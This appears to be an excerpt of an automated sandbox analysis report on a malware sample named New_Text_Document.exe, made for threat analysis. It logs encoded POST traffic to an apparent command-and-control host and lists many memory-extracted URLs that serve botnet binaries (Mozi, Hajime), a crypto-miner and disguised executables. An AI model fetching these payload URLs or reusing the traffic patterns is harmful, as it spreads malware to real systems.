                    Source: global trafficHTTP traffic detected: POST /oqhk/ HTTP/1.1Host: www.yektakhodro.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yektakhodro.comContent-Type: application/x-www-form-urlencodedContent-Length: 187Connection: closeCache-Control: max-age=0Referer: http://www.yektakhodro.com/oqhk/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 36 56 3d 32 70 32 79 56 41 76 6f 75 7a 52 4f 58 46 67 70 42 4c 47 75 68 6a 45 51 30 38 63 67 69 48 76 53 75 38 68 55 4a 55 4f 39 56 55 58 46 47 62 4d 45 46 59 63 37 4a 45 4c 54 7a 7a 50 56 6b 34 4f 30 75 46 55 6d 34 4e 38 39 71 4b 63 39 50 4b 41 44 53 34 42 52 67 2f 6f 63 68 6d 47 64 74 55 48 43 53 4b 78 48 63 6e 51 69 37 7a 57 35 4a 4c 53 63 4f 48 68 49 75 4a 5a 4b 4b 68 36 41 54 4f 73 59 61 6c 35 4e 42 69 58 67 69 34 65 6f 78 53 62 6e 52 73 32 6d 55 68 54 71 47 30 53 4c 4e 33 39 79 37 6f 67 31 7a 2f 31 66 66 75 61 75 76 6f 4c 61 79 4d 6d 6b 2f 53 4d 3d Data Ascii: 6V=2p2yVAvouzROXFgpBLGuhjEQ08cgiHvSu8hUJUO9VUXFGbMEFYc7JELTzzPVk4O0uFUm4N89qKc9PKADS4BRg/ochmGdtUHCSKxHcnQi7zW5JLScOHhIuJZKKh6ATOsYal5NBiXgi4eoxSbnRs2mUhTqG0SLN39y7og1z/1ffuauvoLayMmk/SM=
                    Source: global trafficHTTP traffic detected: POST /oqhk/ HTTP/1.1Host: www.yektakhodro.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yektakhodro.comContent-Type: application/x-www-form-urlencodedContent-Length: 207Connection: closeCache-Control: max-age=0Referer: http://www.yektakhodro.com/oqhk/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 36 56 3d 32 70 32 79 56 41 76 6f 75 7a 52 4f 58 6b 51 70 45 6f 65 75 71 6a 45 54 6f 73 63 67 73 6e 76 57 75 38 64 55 4a 51 2f 36 56 6d 44 46 47 36 38 45 58 63 41 37 46 6b 4c 54 34 54 50 71 70 59 4f 2f 75 46 59 55 34 4d 51 39 71 4c 34 39 50 4b 77 44 54 4c 59 48 6a 50 6f 65 75 47 47 62 67 30 48 43 53 4b 78 48 63 6e 30 45 37 33 36 35 4a 62 69 63 50 6a 56 48 6b 70 5a 4e 65 78 36 41 58 4f 73 55 61 6c 35 56 42 6a 4b 39 69 36 6d 6f 78 58 66 6e 41 64 32 6c 64 68 54 73 4a 55 54 73 4a 57 6b 4c 67 71 39 4c 7a 4e 64 63 42 4c 69 36 70 2b 57 47 79 4e 36 34 2f 55 42 62 66 4a 2b 67 6a 36 77 55 64 48 6e 48 47 74 71 37 62 6b 2f 72 Data Ascii: 6V=2p2yVAvouzROXkQpEoeuqjEToscgsnvWu8dUJQ/6VmDFG68EXcA7FkLT4TPqpYO/uFYU4MQ9qL49PKwDTLYHjPoeuGGbg0HCSKxHcn0E7365JbicPjVHkpZNex6AXOsUal5VBjK9i6moxXfnAd2ldhTsJUTsJWkLgq9LzNdcBLi6p+WGyN64/UBbfJ+gj6wUdHnHGtq7bk/r
                    Source: global trafficHTTP traffic detected: POST /oqhk/ HTTP/1.1Host: www.yektakhodro.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.yektakhodro.comContent-Type: application/x-www-form-urlencodedContent-Length: 1223Connection: closeCache-Control: max-age=0Referer: http://www.yektakhodro.com/oqhk/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 36 56 3d 32 70 32 79 56 41 76 6f 75 7a 52 4f 58 6b 51 70 45 6f 65 75 71 6a 45 54 6f 73 63 67 73 6e 76 57 75 38 64 55 4a 51 2f 36 56 6d 62 46 47 6f 30 45 46 37 30 37 45 6b 4c 54 31 7a 50 52 70 59 4f 69 75 47 70 64 34 4d 4d 74 71 49 51 39 4f 72 51 44 48 75 73 48 30 2f 6f 65 73 47 47 65 74 55 48 74 53 4b 68 35 63 6e 45 45 37 33 36 35 4a 5a 36 63 4a 33 68 48 33 35 5a 4b 4b 68 36 55 54 4f 74 39 61 6c 68 76 42 6a 65 74 6a 4c 47 6f 77 33 76 6e 54 50 75 6c 53 68 54 75 4d 55 54 30 4a 57 59 71 67 71 67 36 7a 4e 5a 32 42 4d 57 36 72 2f 58 6c 70 65 2b 50 6d 6e 74 77 59 72 50 7a 72 4c 6f 79 58 32 6e 33 44 61 36 70 5a 67 69 54 54 44 78 64 55 4d 69 51 4a 73 71 68 2b 57 4b 6a 6c 49 36 69 4c 2b 6e 47 6f 43 76 57 34 36 41 71 6d 61 38 41 4e 6c 5a 2b 7a 6c 33 31 4d 4b 32 39 59 6c 4b 77 43 7a 2f 76 64 37 46 42 55 52 37 36 66 47 61 61 6f 48 37 6a 5a 33 30 35 52 33 33 6a 6a 6a 30 72 5a 79 6a 4d 4d 6c 42 68 45 55 51 38 6e 48 61 34 47 56 50 57 58 70 48 55 48 31 54 32 77 6d 73 47 34 31 78 38 74 46 38 47 43 62 68 53 56 63 4b 65 6c 68 79 34 61 39 4e 65 38 52 6e 2f 6c 48 70 65 30 66 55 6c 54 57 2f 45 43 30 6f 36 6a 56 43 45 76 48 2f 7a 6e 33 57 4a 74 34 6c 57 48 52 30 7a 57 69 69 44 34 58 39 49 72 64 4f 41 49 42 31 78 36 56 78 72 30 30 4f 68 77 78 39 47 30 4f 39 78 59 4a 45 53 59 6e 39 31 43 32 68 77 32 6f 37 63 59 2b 68 43 45 32 4f 46 76 68 2b 46 58 5a 44 72 65 2b 4f 36 69 59 79 46 35 53 61 45 51 2f 74 45 76 4a 56 59 34 4d 38 35 7a 6b 42 51 69 65 79 6c 57 6c 41 38 2f 56 36 73 63 76 45 30 65 37 58 46 52 66 6b 6b 75 36 38 70 42 4a 75 6a 73 71 37 53 50 4f 55 47 78 59 70 70 71 4b 43 62 50 51 48 46 4b 38 4b 78 74 33 46 6c 4e 67 69 4f 4e 44 70 63 57 71 43 31 2b 78 73 65 73 38 32 37 55 76 77 77 71 2f 35 2f 2b 31 58 44 70 62 65 64 76 76 36 59 45 2f 54 31 4f 33 4e 71 54 58 56 54 39 31 44 38 4a 45 4a 50 56 59 5a 64 46 76 59 6b 46 63 50 36 65 62 2f 42 7a 53 68 62 54 55 47 78 2f 38 54 66 6a 36 33 74 34 35 68 6a 32 35 56 51 6b 4e 46 4d 36 44 74 78 52 6a 6c 76 70 33 77 42 2b 41 74 71 6d 35 6e 6f 59 67 6d 6b 44 67 37 39 4b 33 79 71 54 31 54 69 79 33 36 4b 6a 7a 32 77 30 53 2b 68 71 6c 34 59 6a 50 32 52 69 42 70 77 59 76 45 57 46 67 79 75 55 39 37 70 57 33 63 5a 72 6e 43 58 32 79 30 65 48 4d 6b 73 45 48 37 4a 4f 6d 67 46 6f 6c 62 57 42 45 50 75 30 46 4c 4b 65 5a 55 58 39 46 2f 55 32 66 75 46 6f 37 55 6b 4c 30 30 32 4a 4c 4a 44 71 75 5a 5a 66 6f 57 4a 5a 62 32 72 30 50 62 6d 39 75 4c 31 74 6f 41 6e 42 62 73 6b 4d 56 68 4a 66 6d 37 6d 75 66 50 4d 57 76 6b 4b 43 6a 70 46 45 6a
                    Source: global trafficHTTP traffic detected: GET /oqhk/?6V=7reSW0LkqgN1RwZqN6CxsDEv/5Yp8k7QpN9VGUz5XmbOUIotZrctGlff0kfis4OAuUZY0rsDlpQbHYNFUIEE2OME+Uef91LzELJ3T2wZ6zvi&u0=k6nXc HTTP/1.1Host: www.yektakhodro.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                    Source: Joe Sandbox ViewIP Address: 217.76.128.47 217.76.128.47
                    Source: Joe Sandbox ViewIP Address: 103.72.68.128 103.72.68.128
                    Source: unknownNetwork traffic detected: IP country count 10
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.41.113.39:16579/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.70.11.174:43812/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.70.12.142:36544/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.70.125.86:61920/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.70.81.191:56024/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.87.219.12:57948/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://100.12.115.24:14547/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://100.2.73.74:46053/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://100.33.170.7:33787/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://100.37.147.20:38767/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.121.167/scripts/23s
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.121.206/scripts/23
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.51.121.206/scripts/23s
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.58.145.245:51247/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.58.213.18:10983/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.58.71.40:4847/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.58.80.116:61333/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.58.83.134:12184/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.78.22.102:9600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.39.242.53:50000/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.39.242.53:50000/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://102.66.22.215:44787/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.163.10:7080/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.125.163.10:7080/Hajime
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.133.214.139/2/NINJA.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.164.200.170:7080/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.170.118.35/tungbot.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.229.177/skyljne.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.188.167.113/xmrig32.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.195.141.241:54555/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.227.118.45:56789/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.230.153.181:2570/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.30.10.177/660/audiodg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.39.124.209
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.39.124.209/satup/kung.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.4.117.26:59068/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.43.7.94:7601/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003645000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.72.68.128/S2210M/smss.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.211.164:45793/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.37.101:19439/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.85.95.5/v1/uploads/87DtpAEZULSccOn/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.85.95.5/v1/uploads/g5QMC5XVlj/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.1.205.53:13796/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.15.21.21:36443/.i
